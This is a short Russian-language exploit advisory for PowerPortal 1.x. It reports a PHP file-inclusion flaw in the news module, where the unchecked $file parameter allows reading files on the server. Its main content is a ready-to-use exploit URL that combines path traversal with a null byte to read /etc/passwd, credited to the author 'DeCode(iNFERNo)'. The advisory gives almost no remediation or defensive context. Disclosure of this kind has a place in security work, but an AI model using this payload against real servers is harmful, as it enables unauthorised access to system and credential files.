Уязвимые продукты: PowerPortal 1.х (возможно и старше) 
Тип: PHP-Include 
Результат: Чтение файлов на сервере 
Уязвимость в модуле news 
Отсутствует проверка переменной $file. 

Эксплойт: 

http://target/modules.php?name=news&file= ./../../../../../../../../../../etc/passwd%00 

Автор: DeCode(iNFERNo)

Оставить мнение